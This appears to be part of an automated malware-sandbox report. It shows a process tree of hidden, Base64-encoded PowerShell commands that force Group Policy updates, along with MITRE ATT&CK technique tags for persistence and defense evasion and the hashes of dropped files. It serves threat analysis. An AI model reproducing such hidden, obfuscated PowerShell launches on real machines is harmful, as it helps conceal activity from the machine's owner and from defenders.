C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:340 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1508
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2868
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1588
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1592
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2320
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3028
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1829598672-9174819801173572599-1298833006-19345686111560422770-173545962-1303217234"1⤵PID:1880
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "531054384-4472519063154312363024819408786734-1438074446-1639446401284258247"1⤵PID:2612
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16159057113662932451114735311-199320705113764731351192885558-123473489-914520030"1⤵PID:2736
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indirect Command Execution
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50b1a26a5ca5dbae335b9ec313b11a4e0
SHA15e4102366fae9a2f4270b994429af045339b5f0d
SHA2562781b38c2eaf08767bbeb2f7998adad3e846bd6ae759984034f302caf52e9aad
SHA512d87d3261228cc36fff72d4f8e594cb916ec8fdbe3b0693a118e7b13db40ffcd74016d7a80110c8ee660ae749661d49b716b6c6646382556d653452e1e95419fe
-
Filesize
2KB
MD58ce2dc459ea21710c5e87b2ff307efca
SHA1d9128b33539b8a791de4beddd55834acbe231e7e
SHA2561b5008c974157eeec170dbd5dbf9ee3617e079be3625e95c6bc14c6cddf24e5f
SHA5124def951c3e7e3c0faf67a27c5995d57b37404e44f23f738aa7854e816532537f899a33393b4872b7d2580adc188c7fff22f8e3ca6583b7e1b8801447f9509161
-
Filesize
2KB
MD574bb3e54f3b56275b3841198af43b80d
SHA1bb52c414b12c514bd7d52cef3f17424015489892
SHA256319b35bd8b7970d15d1b149fd2a2265dbc1bd1555d2f518a750a2fa2ee461a6c
SHA512eadc85483b66acd8342bcb12d5ce1ee2062e30d00ef215842f3143579d76ea670785e81bd88edb3b90b13c3d453c0f6ddc014a42bee95d90c5dd92973c0e7b0a
-
Filesize
2KB
MD57aa1ffbe6fb12af7cd0fa3375d40b940
SHA1417c561dabae8bb0570c994481d3a2d14c8a530c
SHA25627f430b4c1799bc9f892fc158efc578f8f8e491858c506569409e2316b278a79
SHA51204bddc36923b3101e47518db2381a46da8385886eb75f1365e2be41b4ef6a189fb5b833f2eb31e28eb1bf20f6a4f42e0da6750f4fe5b15f0ff5c1fb6b9a13a79
-
Filesize
2.5MB
MD5a579854caf2206d56bde53cce1d361bd
SHA1f9608be542071a164f3514ee1f6ac2b71e091369
SHA256666014d9859c368ec258dcf5591a2ce6d45a6b623836b2f2ea2b960d3e61a018
SHA5123ced83bae18a53a0dc011cdcd6127282c1e75b77570a9c58c15329bd92944c9c577e32240dc1770aca6e2c81eda01616c3242cdf44e394b044b7282b701be2f9
-
Filesize
2KB
MD5b61e804b0314797308a81d123e4e489b
SHA1d754cfe6c804b3af6bbe52481ad56f8bedc74581
SHA256b187aefb8351f7aedaaa8f8620a0341f9ad3dc5adb67a65c422ee4e0388be328
SHA512c26efe73a3f30bf6d4b9215bb7cb326583ad39c881783304e3cff8cf40a7ae7b648eb81e603da542c346b463269f1fe47c737ea6bec877d674e40b8a8102c471
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5f6e8c05a9c2c9ff29eb7e95bd054aa0d
SHA15c6f1a2cf4255ef6b9157ebb275de7fe3ed3946a
SHA256599a3d5703ed58a43e93a3f8e4f978132b9bdd237a818fd1df6081734e5e1094
SHA512eb677ec95968f89857b18aeccee2fdc5d8eed1c842f1259aeec5732cf8fbb83e21a35864d7149cc0c568c469b8d59eac6d988f01218d43d24a9b68920403c509
-
Filesize
28KB
MD5a141548ac28bfe439bfeab5264319710
SHA152664cc4a3dc7b13008e113cb66bf32b11f634df
SHA256c34cd08b23b6f7c10a19cbb1404b11025e81ae2ba6d87d79ed899b16b4ee95cc
SHA512b17df8073bc7990a39bdeeb40a698d5ba2a4f7b6ab7949d032fadfd2468132e16f000391865785cc53f2562f9dd8c3770707c960d0ccd947ec224a041cc96e60
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c158c97f41771b30fc516a28347b249c
SHA166ccd09e5e6e955ce90d9aa9b904124b4e3a9f91
SHA256359333fe00e09542773823c9401c4ff3d9306bf93499e199ead42ecb2c436335
SHA51264972f108b7c48ec37559381c6a696d2015d80831d3d69e398cd15aa1d84f599123caa18f56c931920d0cb0e15ce3e7bb07dcc071bdc625c5a0e272131090cfd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58c66bd48ea624c819cd9383cf68bf2fe
SHA1022905d4b78c348dec1791f8196543442df852ec
SHA25606c9c35cdb9acd78a7f08630f3c7348d1c8d59cb3b9b0be00a2f199e7baec1fe
SHA51228486367a9702ed28b8867418b6298a9adde33e2603e52b023e09a5d49edd9e6b0e3c24b88b4f1255c5150f085df71ac819b54eacb8c12a6af8ece1fcb82cd2b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD55967e1fb1f49493eb883daf800ae1d05
SHA15089d795c83b99ec89ab174b1f28f6e4ac95cffb
SHA2568469406fb1984d16a8304b377050e57a76fc8ea83f263e63bfbde7f600d73214
SHA512c37fa12311add8559629cf430c4d20e420ff1ad0ac9450289f31c48bc2ca7c4da0049aae0386e9bbc5c61b76485e76238af8a308bc6282dd5840d46d46047f73
-
Filesize
7KB
MD5a86030e754090038ff485fd56098931c
SHA158fb91fbb95a494fdb34c6a58ac11694aee8b97b
SHA2561a1b5c4b7ccb500c4ef9e45ff327f7730b4ec1ae9dd26153b70bbc5c7ac354f8
SHA5129a79fdca32f941ea23903040bdf6f814cb5a6c23d661913d8f16a2ba774acab1a9e152b47361852d1bc2d52e40ba4585425ef4628511e5d8b15c974e9eeb6093
-
Filesize
9KB
MD5da1e6b889e7a0465b16e1beb1bb986af
SHA15b9e7e2a77f6773ffb4094a0cf5f0cea94bace33
SHA25694b04346e9e32d67ef56d446f7b72f9c3d70f266ecbacaee5be34ac7ce7abbde
SHA512491fa80c870c1eed0725404f0ed5e6742503ed1df6964a0a3a3a64b20c09509378545ab795d50a99776ebbdc83d75b5bef85581df7b5c765a63b7b0ff2dbb889
-
Filesize
6.4MB
MD52d4c473cc2ca389edee5cff1f0ed05d0
SHA1cf891304e4868c9d621e96438dff6b9300ad5167
SHA25676f76da6ec1571a9559645518a08b3114933a58c70eda4fd4dff65dabe2f5e08
SHA51285ca1288b7c99066cf44abcf184c7a6acb87ba266f5ed3807c823e35dbeb8e3d0a469180dbc1d0108cfc60ec8565e529647a43ec60c880714b4c73b0975ce41e
-
Filesize
5KB
MD556f153b8c95b82958d4309c3d4d75c01
SHA1c5ca575b4af27ee1e2bb8cbc74d01ca5adec19be
SHA25631688ad4614779345cb3cd2956e4e0930051497d72213ff9bcd1514d35b2054d
SHA51250f190739391571c95bbd846e828fb1a46f3bbff2f312b4576d9d22d76ff43c28892ee4beb167faf97be17bc17d1300b60d9acb77ac4be741cbaa5bb54c42f38
-
Filesize
6.4MB
MD547f5ec2e72f9b41ed6186f70d73db727
SHA10bdcc51450852d092de019360e96608246bc4432
SHA256c9ef126ccd3f5fe3e1d3ac789b65de67741feb6994d5786410023b3a58bd634a
SHA512031ec5e858b84c16a427860435dc667078438e1adeadeb0ce719f69b418577fbf8af8bbe8a281c4dfb3d89c542bf25ce23a4094aec2e565383dbf2f6a6c7700e
-
Filesize
6.8MB
MD52798134831906615f341e698d75df451
SHA178acad5747fef6bbf436a06e47e66259b5eab581
SHA256e6f73b37ea8a50683f40be08abc30cc907e9b818c09e91a63d36a0d4da90143e
SHA512dc238f5fce730c07ce9c80b6457a1caee66ee9d6ed469138ac2910016faf1d01e2545c6743f24056461e14ac6bd489d501ff819e6823fd750a4c31edbe8b2be3